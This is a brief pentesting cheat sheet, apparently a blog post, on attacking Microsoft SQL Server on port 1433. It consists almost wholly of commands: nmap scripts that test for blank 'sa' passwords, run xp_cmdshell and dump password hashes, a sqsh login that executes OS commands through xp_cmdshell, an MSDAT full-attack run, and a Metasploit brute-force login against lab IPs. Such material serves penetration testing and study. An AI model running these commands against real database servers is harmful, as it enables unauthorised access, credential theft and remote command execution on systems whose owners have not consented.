Port 1433 – MsSQL

How to enumerate port 1433 (MSSQL)

0

Nmap Information Gathering:

nmap -p 1433 --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER $ip

sqsh – Interactive database shell:

# Log in to mssql
sqsh -S 192.168.1.101 -U sa

# Execute commands
xp_cmdshell 'date'
go

MSDAT (Microsoft SQL Database Attacking Tool):

An open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.

https://github.com/quentinhardy/msdat

python msdat.py all -s 192.168.1.101

MSSQL Brute Force Attack:

The Metasploit module will simply query the MSSQL instance for a specific user/pass (default is sa with blank).

use auxiliary/scanner/mssql/mssql_login
msf auxiliary(mssql_login) > set rhosts 192.168.1.104
msf auxiliary(mssql_login) > set user_file /root/Desktop/user.txt
msf auxiliary(mssql_login) > set pass_file /root/Desktop/pass.txt
msf auxiliary(mssql_login) > run

Leave A Reply

Your email address will not be published.